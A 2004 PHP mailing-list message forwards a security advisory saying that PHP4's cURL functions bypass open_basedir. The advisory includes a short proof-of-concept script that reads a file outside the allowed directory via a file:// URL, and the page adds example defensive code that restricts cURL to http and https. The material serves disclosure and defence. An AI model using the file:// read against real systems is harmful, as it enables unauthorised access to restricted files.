Is this legitimate?
I took a (very) quick look at bugs, and didn't see it.

(deleted the note)

S

-------- Original Message --------
Subject: [PHP-NOTES] note 46955 added to function.curl-init
Date: Thu, 28 Oct 2004 09:03:55 -0700
From: [EMAIL PROTECTED] (a)
To: [EMAIL PROTECTED]

from http://www.packetstormsecurity.org/0410-advisories/php4curl.txt

====================================================
Subject: PHP4 cURL functions bypass open_basedir
Author: frame at kernelpanik.org
Product: PHP4 compiled with cURL (not tested in PHP5)
Vendor: PHP/Zend
Vendor URL: www.php.net
Type: Local
Risk: Low/Medium
=====================================================

PHP cURL functions bypass open_basedir
protection, so users can navigate through
the filesystem.

For example, with "open_basedir" in php.ini set to
"/var/www/html", anybody can retrieve "/etc/parla"
using cURL functions.

== Proof of concept (curl.php)
<?php
$ch = curl_init("file:///etc/parla");
$file=curl_exec($ch);
echo $file
?>

== Demo
$ cat /etc/parla
don't read please!

$ links -dump http://localhost/curltest/curl.php
don't read please!

== Release Timeline
No release timeline.

--
FraMe <[EMAIL PROTECTED]>
http://www.kernelpanik.org
----
Manual Page -- http://www.php.net/manual/en/function.curl-init.php


--
PHP Notes Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

--
PHP Internals - PHP Runtime Development Mailing List
To unsubscribe, visit: http://www.php.net/unsub.php
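
An application-level guard against the behaviour the advisory describes, added here as an example (it is not code from the advisory, the thread, or PHP itself). The helper names `url_scheme_allowed()` and `safe_curl_fetch()` are hypothetical, and the block assumes a PHP build whose cURL extension exposes `CURLOPT_PROTOCOLS` and `CURLOPT_REDIR_PROTOCOLS`.

```php
<?php
// Added example: hypothetical helpers, not part of PHP or the advisory.
// Idea: never hand a caller-supplied URL to cURL unless its scheme is on an
// allow-list, and also tell libcurl itself to refuse every other protocol.

const ALLOWED_SCHEMES = ['http', 'https'];

function url_scheme_allowed(string $url): bool
{
    // parse_url() returns null/false when there is no usable scheme.
    $scheme = parse_url($url, PHP_URL_SCHEME);
    return is_string($scheme)
        && in_array(strtolower($scheme), ALLOWED_SCHEMES, true);
}

function safe_curl_fetch(string $url): string
{
    if (!url_scheme_allowed($url)) {
        throw new InvalidArgumentException("scheme not allowed: $url");
    }
    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER  => true,
        // Second layer: libcurl rejects file:// and friends even if the
        // check above is bypassed or removed later.
        CURLOPT_PROTOCOLS       => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        // Same restriction for redirect targets, should redirects be enabled.
        CURLOPT_REDIR_PROTOCOLS => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_FOLLOWLOCATION  => false,
        CURLOPT_TIMEOUT         => 10,
    ]);
    $body = curl_exec($ch);
    if ($body === false) {
        throw new RuntimeException('fetch failed: ' . curl_error($ch));
    }
    return $body;
}

// Constructed sample inputs; only the scheme check runs, so this works offline.
$samples = ['file:///etc/parla', 'FILE:///etc/parla', 'https://www.php.net/', '/etc/parla'];
foreach ($samples as $u) {
    printf("%-24s %s\n", $u, url_scheme_allowed($u) ? 'allowed' : 'rejected');
}
```

Where scripts have no need for cURL at all, listing the cURL functions in the `disable_functions` directive in php.ini removes the path entirely.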


